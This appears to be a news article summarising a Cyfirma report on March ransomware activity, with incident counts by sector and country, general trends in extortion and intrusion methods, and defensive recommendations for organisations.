New data from Cyfirma disclosed that ransomware activity in March reflects a continuation of the sector’s shift toward structured, repeatable extortion models, where encryption is paired with data theft to maximize pressure on victims. The findings show that growing fragmentation of extortion groups suggests that smaller or emerging threat actor groups could adopt automation, AI-assisted reconnaissance, and data-driven victim profiling to scale operations efficiently. These campaigns rely heavily on coercive messaging, warning against third-party recovery attempts and reinforcing the risk of permanent data loss, underscoring how psychological pressure remains central to payment conversion strategies.
At the operational level, ransomware actors in March continue to refine rather than reinvent their tactics, prioritizing efficiency, scalability, and consistency across attacks. Cyfirma assesses that groups are likely to enhance encryption speed, standardize extortion workflows, and expand double extortion practices, while relying on common intrusion vectors such as phishing and exposed services. The broader trajectory points to incremental evolution within a mature ecosystem, where innovation is less about novel techniques and more about optimizing execution and monetization across a globally opportunistic threat landscape.
Cyfirma noted that ransomware targeting continues to focus on high-value economies, particularly the U.S., and on critical sectors like manufacturing, healthcare, and IT, where disruption and sensitive data can be monetized effectively. Attackers are refining their methods through rapid vulnerability exploitation, credential abuse, living-off-the-land techniques, and low-detection execution, enabling faster and more covert intrusions.
At the same time, ransomware economics are shifting, with fewer victims paying but higher ransom demands, indicating a move toward selective high-value extortion alongside large-scale attacks. The increasing overlap with state-linked activity and the use of scalable infrastructure further highlight ransomware’s evolution into a resilient, modular, and globally distributed cybercrime ecosystem.
In March, ransomware activity remained heavily concentrated in sectors that combine operational dependency with high-value data exposure. Professional goods and services emerged as the most targeted sector with 245 incidents, reflecting attackers’ focus on organizations handling sensitive client and business-critical data. Manufacturing followed with 176 incidents, and consumer goods and services recorded 118, highlighting sustained pressure on production-driven and customer-facing industries where disruption directly affects revenue.
Significant targeting was also observed in healthcare with 106 incidents and information technology with 95, underscoring risks to critical services and the central role of IT providers within supply chains. Additional activity was spread across real estate and construction with 80 incidents, government and civic sectors with 72, and materials with 67, pointing to continued exposure in infrastructure and public-facing domains.
Mid-tier activity included finance with 39 incidents, education with 37, telecommunications and media with 36, and transportation and logistics with 34. Lower volumes were recorded in energy and utilities with 26 incidents, and automotive with 21, alongside 42 unidentified or obfuscated cases, reinforcing a consistent targeting strategy focused on sectors where disruption and data compromise can be most effectively monetized.
The Cyfirma report disclosed that ransomware operations are shifting toward custom-built and AI-assisted tooling, reducing reliance on publicly available builders and enabling low-detection, per-target payload generation. Attackers are increasingly exploiting internet-facing vulnerabilities and zero-day flaws, particularly in enterprise software and edge infrastructure, to gain rapid and often unauthenticated initial access.
Intrusion models are becoming more modular and multi-stage, with initial access, persistence, reconnaissance, and ransomware deployment decoupled and executed selectively. At the same time, there is a growing reliance on credential-based access and identity compromise, including brute-force attacks and insider involvement, which reduces dependence on traditional phishing techniques.
Ransomware campaigns are also adopting user-assisted execution and social engineering methods, such as ClickFix, allowing attackers to bypass security controls through legitimate user actions. In parallel, threat actors are increasingly using fileless and low-noise execution techniques, relying on legitimate tools and in-memory payloads to evade endpoint detection.
The ransomware ecosystem continues to function as a distributed and collaborative model, involving initial access brokers, affiliates, and specialized operators across different stages of the attack lifecycle. Extortion strategies are evolving into multi-layered approaches that combine encryption, data theft, operational disruption, and adaptive monetization tailored to the specific context of each victim.
Cyfirma mentioned that ransomware activity in March remained sharply concentrated in the U.S., which recorded 1,245 victims and retained a clear lead as the primary global target. A second tier of activity centered on the United Kingdom with 115 incidents and Canada with 109, followed by Germany with 80, France with 78, and Italy with 68, underscoring a continued and deliberate focus on mature, high-value economies.
Beyond these core targets, activity extended into both developed and emerging markets, with Brazil reporting 51 incidents, India 44, Spain 42, Thailand 41, and Australia 36. Mid-level volumes were observed in Switzerland and Turkey with 27 each, Mexico with 24, Taiwan with 23, Singapore and the UAE with 21 each, South Korea with 20, and Argentina with 19, pointing to consistent targeting of globally connected economies and regional hubs.
Most other countries registered low double-digit or single-digit incidents, reflecting a long-tail pattern of opportunistic attacks. Taken together, the distribution underscores a familiar dynamic, with ransomware activity heavily concentrated in a handful of high-value geographies while remaining broadly dispersed across the global threat landscape.
Cyfirma observed that ransomware activity in March reflected a clear shift from opportunistic attacks toward a more structured and economically optimized model. The ecosystem is becoming increasingly fragmented, with a growing number of active extortion groups operating alongside a broader network of initial access brokers and specialized operators.
At the same time, attackers are moving away from reliance on high payment rates, instead scaling attack volume while extracting larger ransom amounts from a smaller pool of high-value victims. This signals a more calculated approach to value extraction, where targeting is selective, data-driven, and focused on organizations with the greatest ability to pay or the most to lose.
Operationally, ransomware actors are accelerating intrusion timelines by rapidly exploiting newly disclosed vulnerabilities in enterprise software, particularly remote access and communication platforms, to gain immediate privileged access. This is paired with a steady rise in credential-based attacks, living-off-the-land techniques, and the abuse of legitimate administrative tools, allowing attackers to blend into normal network activity and evade detection.
The use of scalable infrastructure, including virtualized environments and cloud-hosted systems, further enables efficient payload distribution and resilience against takedowns. Taken together, these developments point to a ransomware landscape that is faster, more modular, and increasingly difficult to disrupt, with attackers prioritizing stealth, speed, and precision over brute-force execution.
In conclusion, Cyfirma observes that ransomware entering 2026 has evolved beyond isolated cyber incidents into a persistent, multi-stage business threat that blends cybercrime, espionage tradecraft, and economic coercion. The separation of access, execution, and extortion, along with the abuse of trusted environments and long-lived access infrastructure, is steadily weakening traditional exploit-focused and signature-based defenses.
This comes as growing scale and complexity of affiliate-driven operations introduce points of fragility that can be targeted beyond the endpoint, particularly across access brokers, backend infrastructure, and coordination layers. For organizations, resilience now hinges less on preventing every intrusion and more on governance readiness, third-party risk oversight, visibility into user interactions, and executive-level response planning. As ransomware groups lean further into stealth, flexibility, and psychological pressure, proactive threat monitoring and coordinated response strategies will be essential to limit both operational disruption and long-term business risk.
Recent reporting shows ransomware increasingly overlapping with state-linked activity and faster, vulnerability-driven attacks. Iranian-affiliated actors are using ransomware proxies and cybercriminal networks to target U.S. critical infrastructure, blending geopolitical objectives with financially motivated operations and leveraging existing criminal ecosystems for scale and deniability.
At the same time, groups such as Storm-1175 are accelerating attacks by exploiting web-facing systems and newly disclosed vulnerabilities, particularly in healthcare and professional services across the U.S., the U.K., and Australia. These campaigns compress intrusion timelines and prioritize rapid access, data theft, and ransomware deployment, reflecting a broader shift toward speed, efficiency, and immediate operational impact.
